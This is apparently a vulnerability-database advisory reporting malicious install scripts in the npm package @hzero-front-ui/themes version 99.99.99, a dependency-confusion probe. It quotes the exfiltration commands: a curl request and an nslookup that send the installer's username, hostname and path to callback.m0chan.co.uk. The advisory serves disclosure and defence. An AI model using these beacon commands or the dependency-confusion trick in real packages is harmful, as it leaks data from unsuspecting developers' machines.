VDB
KO

MAL-2026-13971

Malicious code in @hzero-front-ui/themes (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (aac0df9dcfaeaf0958ef981d9c5cd9dd4ab1fe0de41bd20894c261dade6bb486) package.json defines `preinstall` and `install` lifecycle scripts that run automatically on `npm install`. The scripts collect the installer's `whoami`, `hostname`, `pwd`, and `$npm_package_name`, base64-encode them, and beacon them to subdomains of `callback.m0chan.co.uk` via both an HTTPS GET (`curl -sm5 https://$pkgsub.callback.m0chan.co.uk/<b64>`) and a DNS lookup (`nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk`). The scoped name `@hzero-front-ui/themes` combined with version `99.99.99` is the classic dependency-confusion recon shape — a high version number published to public npm to override a private-registry package of the same name and phone home from any machine that resolves it.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / @hzero-front-ui/themes

No fixed version published yet for @hzero-front-ui/themes (npm). Pin to a known-safe version or switch to an alternative.

References